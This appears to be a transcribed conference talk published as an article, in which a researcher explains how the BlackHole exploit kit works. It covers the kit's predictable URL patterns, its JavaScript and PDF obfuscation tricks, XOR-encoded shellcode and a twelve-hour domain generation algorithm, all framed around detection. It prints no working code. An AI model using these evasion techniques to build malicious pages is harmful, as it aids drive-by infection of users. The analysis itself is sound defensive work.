Quantcast

The State of Web Exploit Toolkits 3: How BlackHole Works

Jason Jones covers herein some of the specific features inherent to BlackHole kit, including JavaScript and PDF obfuscation details, JavaScript shellcode, etc.

BlackHole’s typical features

BlackHole’s typical features

Now I’ll actually get a little bit more into how it works. Running all these things through our sandbox, we’ve looked a lot at URLs that it uses, redirects to where it loads its payloads. We actually found it’s quite predictable, at the moment at least. A lot of times it’s a PHP file; it’s normally showthread.php, main.php. It normally has one URL parameter, and a lot of times it’s actually ‘page=’, and then it’s, like, a 16-character hex string. So it’s something that’s very detectable, but it’s like I can look at a URL and I can say: “I’m pretty sure that’s BlackHole”, but then it’s also close enough to some normal URL, and you kind of get into that spot of “I can’t just stop someone from visiting that because it could be a legitimate page, and I would end up getting yelled at if I did that”. So, once that’s loaded and it ends up redirecting to its malware payload, a lot of times it’s a 1-letter PHP file – w.php is what I’ve observed a lot; t.php is also another common one.

So, it’s very predictable but it can easily block a lot of legitimate traffic. It’s like – you have ‘f’ and ‘e’ as URL parameters, the values are all within very small ranges – I can tell what you’re doing, but it ends up becoming very hard to only block that.

BlackHole-specific JavaScript obfuscation

BlackHole-specific JavaScript obfuscation

The JavaScript that BlackHole uses – there are obfuscation techniques (see left-hand image), they tweak them just a little bit, so every time you’re going through the obfuscation, it’s like I can catch everything you’re doing now, and then they tweak it just a little bit to where now you don’t catch it. They’ll use character separators; they’ll have a text blob in HTML element or parameter, sometimes they’ll actually just have a giant URL or integers. So they go through that, they pull this out, they’ll actually do a split to turn their text blob into an array of integers, if it’s not already, and they’ll run it through deobfuscation routine. It normally includes many other common obfuscation techniques like doing string from CharCodes, using square bracket in quoted value to execute a function, like ‘window[ “eval”]’, or sometimes they’ll break it up to e+v+al, or they’ll actually even assign one variable to half of it and then another to that plus the other half of it.

So it’s very common stuff that we see a lot, so then the deobfuscation routine, once it actually gets to the point where it’s handling this giant text blob, splits it and it’ll do a string from CharCode, and then it’ll add or subtract an integer and end up building up a giant string that is normally reassigned ‘eval’ in JavaScript. And that actually ends up being a malicious iFrame that redirects to their site, and so you end up getting browser and plugin detection, and launching and loading malware.

JavaScript obfuscation on code level

JavaScript obfuscation on code level

Here’s an actual sample (see right-hand image). On the left you see deobfuscated JavaScript, on the right you see the obfuscated JavaScript. You see in the left-hand part where it says: “Please wait page is loading” – that’s usually one of the indicators in deobfuscated JavaScript. It’s like you just visit a site that’s been affected by BlackHole, and you should probably get your computer scanned. In the bottom right-hand part, you actually see the text blob I was talking about, and this one is a little bit different, where they use ‘;.’ as the separator between their values. And up there you see a string from CharCode, they’re actually doing some math, so you’ll see a ‘floor’ value – they do a ‘floor’, they do a lot of other tricks. It’s like you can open up a web page and look at this and you can say: “That’s definitely malicious, but how do I stop that before it gets to what’s on the left where it’s transformed in the browser?” So you stay on your toes, keep on top of everything, and it ends up being a very difficult problem.

PDF obfuscation, in a nutshell

PDF obfuscation, in a nutshell

They also do a lot of PDF exploits (see right-hand image) but they use different obfuscation than they use in JavaScript. They do ASCII character replacement in PDFs and turn something like &#00097 into an ‘a’. But they still use either giant text blobs or arrays of @s. And then they’ll also have multiple character separators like ‘@@@’ sign, but they’ll actually do an ASCII character replaced for the first @ sign, leave the middle @ sign in there, and then do another ASCII character replaced on the last @ sign. So it ends up being very recognizable, but trying to figure out a way to efficiently detect it in an automated fashion becomes a difficult part. Once this gets through the deobfuscation routine, it ends up following very similar patterns that the HTML JavaScript does, it ends up having the same purpose.

JavaScript shellcode

JavaScript shellcode

All of their JavaScript shellcode (see left-hand image), once you deobfuscate it, you can easily find. They don’t make an attempt to hide it. But also, a lot of it exhibits the same behavior, it’s very easily detectable, you see in their ‘JMP / CALL’ patterns you see in shellcode. They try to do a little bit of obfuscation where you load it up and you don’t see anything that looks decent, like you can run strings on it and you won’t see any URLs. But they actually do a simple XOR at the beginning of their shellcode, and then you end up with a good assembly code that you can find a lot of strings in, you can find URLs, you can actually follow it, follow the path of execution – how it gains execution. The image at the bottom is actually one of the URLs we found after we deobfuscated this. You run the shellcode through something like Libmu, and it’s easily detected, so they’re definitely not on the forefront of evading anything like that.

Deobfuscated and obfuscated shellcode

Deobfuscated and obfuscated shellcode

Here (see right-hand image) is an example. The left side is deobfuscated and the right side is the obfuscated shellcode. In the right-hand part you can see it’s actually subtracting a negative number to get the number of bytes that it wants to patch, and that number of bytes ends up being positive. Right there it’s doing its XOR loop, and then that part on the right side is actually becoming what’s on the left, which ends up being the assembly code where it does a bunch of jumps before it starts executing.

Pseudo-random DGA

Pseudo-random DGA

And recently they implemented pseudo-random DNS generation algorithm (see left-hand image), and this makes it harder than something like recent examples of Flashback, but actually everything with Flashback uses the same DNS generation algorithm, connects to the same servers, whereas every instance of BlackHole has slightly different generation algorithms, it changes every twelve hours, and this makes it a lot more difficult to catch every kit. Before, it was like “Hey, I know. So, if you bulletproof-host this DNS name – I can block it”. Now it changes every twelve hours for thousands of installs. At the bottom you’ll actually see there’s a call to make frame, which then ends up generating a pseudo-random string. And this one is using DNSstuff.com which is free dynamic DNS service.

Then it does a random number generator based on the time, and if it’s less than 12 then it’s 0 otherwise it’s 1, so that’s actually where it’s using two cycles of the DNS name per day. Also, it gets a color out of the string, uses its pseudo-random number generator to grab tinker so that it ends up being a color-(10-number character).dnsstuff.com domain name at the end of it. They just recently added this, so they are definitely trying to add more things and keep their position as the most popular kit.
 

Read previous: The State of Web Exploit Toolkits 2: BlackHole Kit Scrutinized

Read next: The State of Web Exploit Toolkits 4: Phoenix and Newer Kits

Like This Article? Let Others Know!
Related Articles:

Leave a comment:

Your email address will not be published. Required fields are marked *

Comment via Facebook: